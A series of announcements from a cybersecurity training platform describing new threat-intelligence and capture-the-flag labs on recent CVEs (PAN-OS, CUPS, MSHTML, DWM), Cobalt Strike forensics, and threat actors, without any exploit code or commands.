New CTI Labs: CVE-2024-0012 and CVE-2024-9474 (Palo Alto PAN-OS) – Offensive and Defensive
Today, we’ve released two brand-new labs focusing on defending against and exploiting two new vulnerabilities in Palo Alto Firewalls! Learn how to attack a Palo Alto Firewall by exploiting these vulnerabilities, as well as how to identify attack remnants and detect them effectively.Introducing The Human Connection Challenge: Season 1
Starting today we will begin releasing a series of all-new Challenge Labs. Each month you’ll be given the chance to showcase your cybersecurity skills across a range of topics and climb the Season 1 Leaderboard, with the chance to win kudos and rewards along the way.New CTI Lab: CRON#TRAP – Linux Environment Emulation
On November 4, 2024,Securonix published researchand identified a novel attack chain where attackers deploy a custom Linux machine using the QEMU emulation service to persist on endpoints, allowing them to run commands and deliver malware. Why have we created this content? Given that this technique is quite new and novel, this content was created to educate users on how legitimate tooling, like virtual environments, can be abused by attackers. When the user is tricked into opening a .lnk file, the virtual machine starts and mounts to the host, giving backdoor access to an endpoint that almost acts as a proxy. What are we publishing? All customers on a CyberPro License have immediate access to a new lab. CRON#TRAP – Linux Environment Emulation Who is this content for? This lab is focused on upskilling and increasing the defensive capabilities of the following roles: Incident Responders Threat Hunters Malware AnalystsNew CTI Labs: Cobalt Strike Host Forensics and SIEM Analysis
Cobalt Strike is an adversary simulation tool developed by Fortra. Cobalt Strike was designed to be used by professional red teams to perform post-exploitation actions such as enumerating file systems, elevating privileges, and deploying malware. Despite being designed for red teams, threat actors often use both licensed and unlicensed (cracked) versions of Cobalt Strike for malicious intentions. Why have we created this content? A recent report again stated that Cobalt Strike is the C2 framework of choice by hackers around the world. We previously had no labs covering how to identify and defend against this C2 framework. Therefore, as we have with Havoc and Sliver, we have released labs based on analysis of its activities in networks and on a host and created and released volatility plugins to help defensive teams in their own analysis. What are we publishing? All customers on a CyberPro License have immediate access to two new labs. Threat Research: Cobalt Strike C2 – Host Forensics Threat Research: Cobalt Strike C2 – SIEM Analysis Who is this content for? These labs are focused on upskilling and increasing the defensive capabilities of the following roles: SOC Analysts Incident Responders Threat Hunters Malware AnalystsFace Your Fears this Halloween and Return to Haunted Hollow
🧛♀️ Brace yourselves, brave souls! The haunted season has returned, and with it, an all-new cybersecurity adventure—Halloween 2024: Return to Haunted Hollow. The sinister spirits of cyberspace await you in this terrifying sequel to our 2023 Halloween collection, The Haunted Hollow. This is no mere challenge—it’s an eerie expedition through 9 haunted labs designed to test your skills and sanity alike. Whether you're a seasoned crypt keeper of the cybersecurity world or a curious newcomer, there's a fright waiting for everyone in this immersive capture-the-flag experience! 🔮 From unraveling encrypted secrets to hunting ghosts in packet captures, every lab holds the key to defeating the horrors lurking within. Can you escape the Haunted Helpdesk, break the Encryption Enigma, or uncover the Spooky, Scary, Silly Snaps? Each step you take deeper into this digital graveyard will challenge your mind and test your courage, until you can break out of the park through the Emergency Exit! 🕷️ With a difficulty ranging from approachable to spine-chillingly tough, it’s not about conquering all the horrors—just enough to emerge from the shadows with your sanity intact. Gather your wits, grab your digital lantern, and get ready to explore the most terrifying corners of cyber horror! 🧛 Release Date: October 16th ⌛ Estimated Time to Complete: 5 hours 👻 Labs: 9, each more terrifying than the last 🎃 Difficulty Range: 2-6 🧟 Collection Type: Challenge Lab details Note: These labs can be completed in any order, but we have ordered them from most accessible to most challenging. The final lab can only be completed after the other labs have been completed. The prequel collection doesn’t need to be completed before you can dive into these labs, but if you're craving some extra chills and thrills, feel free to haunt them first! Phishing for Treats Difficulty: 2 Skills required: None – this lab should be accessible to all audiences What's involved: This lab is a new phishing emails lab, with Halloween-themed emails. Users have to identify whether the email is 'safe' or 'spam' based on indicators from the emails. PCAP Pandemonium Difficulty: 4 Skills required: Packet capture analysis (Wireshark) What's involved: In this lab, users will need to analyse multiple packet captures using Wireshark to identify answers to the questions from the network traffic. Delving Deeper Difficulty: 4 Skills required: Web application enumeration What's involved: Users will need to explore a web application in order to gain access to a computer terminal within the application. From there, they'll need to interact with a simple API. Encryption Enigma Difficulty: 5 Skills required: Modern encryption/encoding techniques (Knowledge of how to use CyberChef will be useful) What's involved: Users will need to identify the correct encoding and encryption technique used to obfuscate each message in an application, before decrypting/decoding each message. Confusing Code Difficulty: 5 Skills required: Linux enumeration techniques, reverse engineering (particularly using Ghidra) What's involved: Users will need to use Linux enumeration techniques to identify a binary, before reverse engineering that binary to figure out how to exploit it. Haunted Helpdesk Difficulty: 5 Skills required: Linux enumeration and privilege escalation techniques What's involved: Users will be dropped into a restricted environment. From there, they'll need to figure out how to escape, and escalate their privileges to root. Fearsome Forensics Difficulty: 6 Skills required: OSINT, web application enumeration, modern encryption techniques, steganography What's involved: In this lab, the user will need to explore the web application and discover clues using OSINT techniques. These clues will then be used to decipher encrypted messages, finally revealing how to extract a message hidden inside an image. Spooky, Scary, Silly Snaps Difficulty: 6 Skills required: AWS capabilities (particularly S3 and AWS permissions), Python scripting What's involved: Users will need to enumerate public S3 resources to identify credentials for an AWS account. From here, they'll need to interact with the AWS console, and identify a way of escalating their privileges on AWS. Emergency Exit Difficulty: 1 Skills required: None – this lab is a culmination of the preceding labs within the collection, but no specific skills are required to complete this lab. What's involved: In each of the labs in this collection, users would have been asked to make a note of a code. In this lab, they need to submit each of these codes. Share Your Thoughts Did you escape the Haunted Hollow? We'd love to hear from you! Remember you can post in our Help & Support Forum for hints, tips & collaboration from your fellow community of experts.New CTI Lab: CUPS Remote Code Execution Vulnerability – Defensive
You may have heard all the hype about the latest Linux RCE that was supposed to be released on the 6th October. It got leaked and released early! At the actual time of release, there was no active patch; however, a few hours later, there was a patch sent out. The researcher who released it says it is a 9.9 in CVSS (meaning terrifying), but at Immersive Labs, we have likened it more to around 6.8. While the hype is not worth it for this particular vulnerability, there are 300,000 exposed machines on the internet that could be affected by this. What is CVE-2024-47177 – CUPS RCE? It is based on a vulnerability from over a decade ago that was accidentally reintroduced when porting code to a new repository. It takes advantage of the CUPS service, which is Linux's way of printing! There is a default service open to the world running on port 631, meaning anyone can connect and begin this attack. The full RCE is a bit more nuanced as it requires some interaction by a user, but it is still worth knowing due to the hype it has caused. Why should you care? Due to its low complexity and potential reach, this vulnerability might worry our customers who use many Ubuntu Desktops in their business networks. Therefore, we have created a lab on how to threat hunt for this vulnerability and the logging that gets produced once the exploit has been successfully executed. Who is it for? Incident responders SOC analyst Malware reverse engineers CTI Analysts Threat Hunters Complete the CUPS Remote Code Execution Vulnerability Lab hereNew CTI Lab: CVE-2024-38112 and CVE-2024-43461 (Windows MSHTML Platform Spoofing): Defensive
On the 15th of July, 2024, Trend Micro released a piece of research following a threat actor named Void Banshee. Void Banshee was observed in May 2024 running a kill chain to deploy the Atlantida InfoStealer. To achieve this, they exploited two vulnerabilities in the Microsoft HTML engine. One vulnerability went un-patched for months! Why have we created this content? These two vulnerabilities, one of which was patched as of September's Patch Tuesday, have been updated by Microsoft and CISA Kev as actively exploited in the wild. Void Banshee, the threat actor who used these vulnerabilities in an attack chain earlier this year, has been seen to attack companies in Europe, North America, and Southeast Asia. Customers need to be aware of how to alert to threats shown by these vulnerabilities and how to ensure they don't fall victim to them. What are we publishing? All customers on a CyberPro License have immediate access to this new lab. CVE-2024-38112 and CVE-2024-43461 (Windows MSHTML Platform Spoofing): Defensive Who is this content for? This lab is focused on upskilling and increasing the defensive capabilities of the following roles: SOC Analysts Incident Responders Threat Hunters Malware AnalystsNew CTI Lab: CVE-2024-30051 (Windows DWM Core Library Elevation of Privilege) – Defensive
CVE-2024-30051 is a zero-day vulnerability discovered in the Windows Desktop Window Manager (DWM) Core Library. Patched as part of the Microsoft patch Tuesday releases, this vulnerability has been observed to be used by threat actors and malware from May 2024 to as recently as September 2024, particularly QakBot. Why have we created this content? Although this vulnerability was reported in May 2024 and patched quickly, exploitation by large malicious threat actors is still being seen. This privilege escalation exploit can be simple to spot for defensive teams. Additionally, a Proof of Concept (PoC) has recently been released, months after the patch, which explains this vulnerability in great detail and comes with the hypothesis that there will be an uptick in exploitation – often is the case when detailed PoCs are released for vulnerabilities. What are we publishing? All customers on a CyberPro License have immediate access to this new lab. CVE-2024-30051 (Windows DWM Core Library Elevation of Privilege) – Defensive Who is this content for? These labs are focused on upskilling and increasing the defensive capabilities of the following roles: SOC Analysts Incident Responders Threat Hunters Malware AnalystsNew CTI Labs: Threat Actor - Peach Sandstorm and Tickler Malware
Peach Sandstorm is a suspected Iranian state-sponsored threat actor that primarily targets organizations in the satellite, communications equipment, oil and gas, and federal and state government sectors in the United States and the United Arab Emirates. Why have we created this content? Microsoft recently reported on this threat actor evolving its tradecraft and using a new multi-stage backdoor called Tickler. This threat actor also uses password-spraying to obtain credentials to Azure services to persist and repurpose them into command and control infrastructure. Targets of interest involve the United States, Western Europe, and the United Arab Emirates. What are we publishing? All customers on a CyberPro License have immediate access to these new labs. Threat Actors: Peach Sandstorm Tickler Malware: Analysis Who is this content for? These labs are focused on upskilling and increasing the defensive capabilities of the following roles: SOC Analysts Incident Responders Cyber Threat Intelligence Analysts Threat Hunters Malware Analysts
